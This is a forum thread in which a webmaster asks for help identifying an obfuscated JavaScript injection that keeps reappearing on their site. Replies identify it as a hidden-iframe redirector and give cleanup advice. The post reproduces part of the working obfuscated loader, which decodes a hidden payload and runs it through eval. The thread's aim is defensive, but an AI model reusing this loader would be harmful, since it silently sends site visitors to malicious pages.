1. Home
  2. Forums Index
  3. Browser Side / JavaScript and AJAX 10:26 pm May 13, 2026

Forum Moderators: open

Message Too Old, No Replies

Malicious script help

malicious script help

         

wspartner

11:32 pm on May 16, 2011 (gmt 0)

10+ Year Member



Hello,
Can anybody help me to figure out what the below code does. It's keeps injecting itself into our site in every index.html files along with some other php files. We keep removing it and have taken several security steps but about every week or so (always on a Sunday or Monday) it reappears! We desperately need to figure out what it does and how it keeps happening.

Below is just about a third of the code. I've removed the <> script tags from the beginning and end for security.

var ar="v)y{ifu=lg[rETCB}me h>;s\"/ 0.,tN1:('<cAb]waonpd";try{'qwe'.length(1);}catch(a){k=new Boolean().toString();date=new Date();};var ar2="f57,57,12,15,78,102,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,
117,129,138,6,105,3,30,81,120,3,9,57,57,57,12,15,33,126,51,54,33,102,3,66,57,57,48,78,54,24,69,54,78,9,57,57,57,138,129,111,18,
51,54,132,90,84,123,33,12,90,54,102,72,108,12,15,33,126,51,54,78,69,33,111,21,105,60,90,90,135,99,75,75,138,129,24,129,126,69,
84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,78,123,12,138,90,60,21,105,96,81,105,78,60,54,12,27,60,90,21,105,96,81,
105,78,69,90,6,24,54,21,105,0,12,69,12,117,12,24,12,90,6,99,60,12,138,138,54,132,66,135,129,69,12,90,12,129,132,99,126,117,69,
129,24,18,90,54,66,24,54,15,90,99,81,66,90,129,135,99,81,66,105,63,108,75,12,15,33,126,51,54,63,72,3,66,57,57,48,57,57,15,18,132,
111,90,12,129,132,78,12,15,33,126,51,54,33,102,3,9,57,57,57,0,126,33,78,15,78,21,78,138,129,111,18,51,54,132,90,84,111,33,54,126,
90,54,36,24,54,51,54,132,90,102,105,12,15,33,126,51,54,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,69,33,111,105,
87,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,3,66,15,84,69,90,6,
24,54,84,0,12,69,12,117,12,24,12,90,6,21,105,60,12,138,138,54,132,105,66,15,84,69,90,6,24,54,84,135,129,69,12,90,12,129,132,21,
105,126,117,69,129,24,18,90,54,105,66,15,84,69,90,6,24,54,84,24,54,15,90,21,105,81,105,66,15,84,69,90,6,24,54,84,90,129,135,21,
105,81,105,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,123,12,138,90,60,105,87,105,96,81,105,3,66,15,84,69,54,90,114,
90,90,33,12,117,18,90,54,102,105,60,54,12,27,60,90,105,87,105,96,81,105,3,66,57,57,57,138,129,111,18,51,54,132,90,84,27,54,90,36,
24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,84,126,135,135,54,132,138,42,60,12,24,
138,102,15,3,66,57,57,48]".replace(k.substr(0,1),'[');pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));e=Function("retu"+pau)();ar2=('gfhgffg',e(ar2));s="";for(i=0;i<ar2.length;i++){s+=ar.substr(ar2(bracket)i(bracket)/3,1);}
e(s);

I replaced the [] brackets above around the i since the post kept telling me that there was an error.

[edited by: whoisgregg at 1:10 am (utc) on May 17, 2011]
[edit reason] Fixed sidescroll, actual code was on single line [/edit]

tangor

11:35 pm on May 16, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Posting the whole thing might not be a wise idea. Have you looked at the sending IP and BLOCKED IT? That would be step one. At the firewall if available. Step two is verifying site security by immediately changing all passwords, access, etc.

lucy24

6:52 am on May 17, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



I say this with hesitation because I'm not even sure what language we're in, but I smell a bored adolescent. The bit about

{s+=ar.substr(ar2[i]/3,1);}

set against the actual content of ar and ar2 is just too goofy; it practically has to come out spelling "Your mother wears Army boots" or similar.

Whew. The [i] trick from php/bb2 works, even though the Forums flatly refused to let me disable [codes].

wspartner

12:40 pm on May 17, 2011 (gmt 0)

10+ Year Member



Hello, thanks for your responses. We blocked what we thought was the IP back about a year ago. We've changed our passwords everytime it happens. It appears to be something that recreates itself internally somehow.

We've run malicious script finding programs on the files and our computers but never can find anything once we've cleaned all the script out of the files.

Does anybody have any ideas what this thing does and how we get rid of it.

p.s. We have all sorts of firewall and security items loaded on the site now and it never detects that anyone hacks in.

whoisgregg

1:26 pm on May 17, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Once a machine has been compromised, it can't ever really be trusted again.

The only real way to have piece of mind is to build a new clean machine and inspect each file before moving it over -- moving only the files you need.

Leosghost

1:27 pm on May 17, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Putting just part of this string ( this bit betweeen the quotes ) )"date[('adsaf','getF')+'ullY'+('qwtrqwt'," into G gives you the answer ..
Short discussion of what it's doing and how it may be getting in at stackoverflow
[stackoverflow.com...]

( was it you who asked there ? )

there is also an "edit" page there where someone ( Rasman ) has split the script to make it easier to read

Various links to the jsunpack unpacker ( with "reports" about it ) ..( cool tool ..if you don't know it already ..bookmark it ..comes in handy )..

Quickly reading all the listings at the unpacker for your script there,( interesting that it reports it as "benign" in some cases ;-) ..IMO depends what you call benign, but there you go..each to their opinion ;-) ) its a redirector that makes either hidden I frames or hidden divs ( it can be set to do either ) to send visitors to various sites ( those can be set inside the script ) ..mainly in RU ..( pharma and forex type stuff ) it has a "listening" element also...but without spending loads of time ( which I don't have ATM ) I couldn't tell you what its ears are cocked for and in which direction.


Follow the advice at stack'..and IIWY ..I'd also scrub all the machines that you use to get to your site ..not just the site itself ..one of you ( presume there are more than one of you with password access ? ) may well be reinfecting the site /server ..

And as said at stack' look for weak points ( broken points ) where it may be injected into your db..blocking a particular IP isn't going to do much ..the bad guys can get a new IP ( or what your server thinks is one ) in a heartbeat..

One last thing ..there is a ref in what G sends back for that string(let) to a malware site..don't get curious when you see things like that ;-)..especially if you are on a windows box.

edit ::whoisgregg posted while I was typing ..agree 100% with him ..( you could spend a lot of your time trying to track this one down )..and on the rebuild pay particular attention to not include weak points ..make sure all input is sanitised before it gets to anywhere important..
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Browser Side / JavaScript and AJAX 10:26 pm May 13, 2026